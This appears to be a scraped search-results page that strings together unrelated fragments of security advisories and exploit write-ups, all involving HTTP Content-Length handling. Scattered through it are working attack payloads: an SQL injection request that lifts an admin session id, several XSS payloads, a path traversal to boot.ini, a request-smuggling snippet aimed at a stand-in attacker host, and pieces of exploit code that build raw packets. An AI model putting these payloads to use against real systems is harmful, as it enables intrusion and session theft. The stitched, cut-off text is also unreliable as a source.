Next Page >>
Content/Length
print "Waiting for connections on port 5050 TCP...\n";
while (my $browser = $server->accept()) { #When a connection occure...
binmode $browser;
my $method="";
my $content_length = 0;
my $content = 0;
my $accu_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
Description:
It is possible to cause Apache HTTP server to return client-supplied scripting code by submitting a malformed HTTP method which would actually carry the payload (i.e.: malicious JavaScript) and invalid length data in the form of either of the following:
Two 'Content-length:' headers equals to zero. i.e.: "Content-Length: 0[LF]Content-Length: 0"
One 'Content-length:' header equals to two values. i.e.: "Content-length: 0, 0"
One 'Content-length:' header equals to a negative value. i.e.: "Content-length: -1"
One 'Content-length:' header equals to a large value. i.e.: "Content-length: 9999999999999999999999999999999999999999999999"
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19
{"new_user_id":"9"}
Finding 2: SQL Injection
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.
[Bug Summary]
- Content-Length entity-header filed miscalculation.
[Impact]
- Low
Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157
IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
SChannelState: 0
and is used in many Linux distributions and some VMware / Dell products.
[=] Vulnerabilities
* CVE-2010-1937 (SFCB bug #3001896) : pre-auth remote heap overflow
using a forged Content-Length header
When parsing a HTTP request, SFCB will use any positive Content-Length
value to allocate a buffer. Then, memcpy tries to copy the user-provided
POST data in this buffer. By sending a small value in the Content-Length
header and more data in the POST body, it's possible to overflow the
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://demo.eyeos.org/
Content-Length: 117
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8
Pragma: no-cache
Cache-Control: no-cache
params=%3CeyeLogin_Username%3Edemo23%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3Edemo23%3C%2FeyeLogin_Password%3E
This is a proof of concept request:
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
__utma=216871948.2116932307.1317632284.1317632284.1317632284.1;
__utmb=216871948.1.10.1317632284; __utmc=216871948;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
$packet .= $data;
sendpacket($packet,0,0,0);
/* Packet 3 --> Change Extension from .gif to .php */
HTTP/1.1 302 Moved Temporarily
Date: Thu, 25 Sep 2008 11:30:05 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
InjectedHeader: BugSec=
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
HTTP Response Splitting
(Affected versions: Any)
E) "Cookie Dump Servlet" escape sequence injection
(Affected versions: Any)
F) Http Content-Length header escape sequence injection
(Affected versions: Any)
G) "Cookie Dump Servlet" stored XSS
(Affected versions: =<6.1.20)
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
Request #2
----------
http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions: <= 3.4 SP4 Patch 2
Platforms: Windows
Bugs: A] GatewayService integer overflow
B] CmpWebServer stack overflow
C] CmpWebServer Content-Length NULL pointer
D] CmpWebServer invalid HTTP request NULL pointer
E] CmpWebServer folders creation
Exploitation: remote
Date: 29 Nov 2011
Author: Luigi Auriemma
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7722
Content-Type: text/html; charset=utf-8
---snip---
<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />
B. Heap-based Buffer Underflow (CVE-2009-0840)
Severity: Medium
By providing a specially-crafted POST request to the "mapserv" CGI
application, an out-of-bounds memory write can be triggered.
Specifically, by setting the "CONTENT_LENGTH" environment variable to
- -1, the code will write a zero byte to "data[ -1 ]", where "data" is a
character array allocated on the heap via malloc(3).
When the following is executed locally on the command line:
if (x.readyState == 4){
}
}
try{
x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost:
at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n") }catch(r){} }
-----------------------------------------------------
the request will become:
----------------------------------------------------
POST / HTTP/1.1
this to execute arbitrary code on the server via crafted id parameters.
CVE-2009-0840
An integer overflow leading to a heap-based buffer overflow when
processing the Content-Length header of an HTTP request can be used by an
attacker to execute arbitrary code via crafted POST requests containing
negative Content-Length values.
CVE-2009-2281
*** SUMMARY ***
GCALDaemon is an OS-independent Java program that offers two-way synchronization between Google Calendar and various iCalendar compatible calendar applications. GCALDaemon is primarily designed as a calendar synchronizer but it can also be used as a Gmail notifier, Address Book importer, Gmail terminal and RSS feed converter.
Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars over HTTP, by uploading their file via an HTTP PUT and getting/refreshing their calendar with an HTTP GET. The GCALDaemon's built-in HTTP server keeps this HTTP messages in sync with a specified Google Calendar. An input validation flaw permits to craft an HTTP request with an abnormal content-length value; this malformed request could trigger a denial of service that arises from a Java out of memory fatal error.
*** VULNERABILITY DETAILS ***
Using a crafted HTTP request, an attacker could trigger a denial of service that arises from a java.lang.OutOfMemoryError when the Java heap space is overfilled.
In the file "org/gcaldaemon/core/http/HTTPListener.java", the GCALDaemon's built-in HTTP server parses the HTTP request and the HTTP header parameters without validation checkpoints.
- 01/28/2011 -> Vendor response. (Acknowledged and fixed the bug)
- 03/04/2011 -> Advisory published.
[Bug Summary]
- Wrong parsing in Content-Length entity-header.
[Impact]
- Low
boundary=----WebKitFormBoundaryCpv+NVAHAgHHdvdI
User-Agent:
X_CLUSTER_CLIENT_IP:
Cookie: ccAdmin=+
Accept: */*;q=0.5
Content-Length: 434
------WebKitFormBoundaryCpv+NVAHAgHHdvdI
Content-Disposition: form-data; name="structure"
1
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
An attack looks like:
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 76
>
> sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
>
> An attack looks like:
>
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
Host: www.example.ch
Content-Length: 256
Cookie: JSESSIONID=A57AABD5F2051C4333F500EBB1232295
Connection: Close
Pragma: no-cache
url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm
}
sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login",
argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3],
argv[4]);
printf("\n[*] Connecting...");
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233
----------1922591683
Content-Disposition: form-data; name="id"
For each HTTP POST request the configuration web server starts the
receiving of the client's data using a heap buffer which automatically
increases its size through realloc.
When the data received is major than the integer value specified in
Content-Length it stops the operation and places a NULL byte at the end
of the data for delimiting it.
The problem is that using a negative Content-Length value forces the
server to place this 0x00 byte in a location of the memory which goes
from heap_buffer+http_header+0x80000000 to
// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards:
0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
Server: NetCache appliance (NetApp/6.0.7)
Connection: close
TRACE http://74.125.65.106/ HTTP/1.1
Next Page>>
|
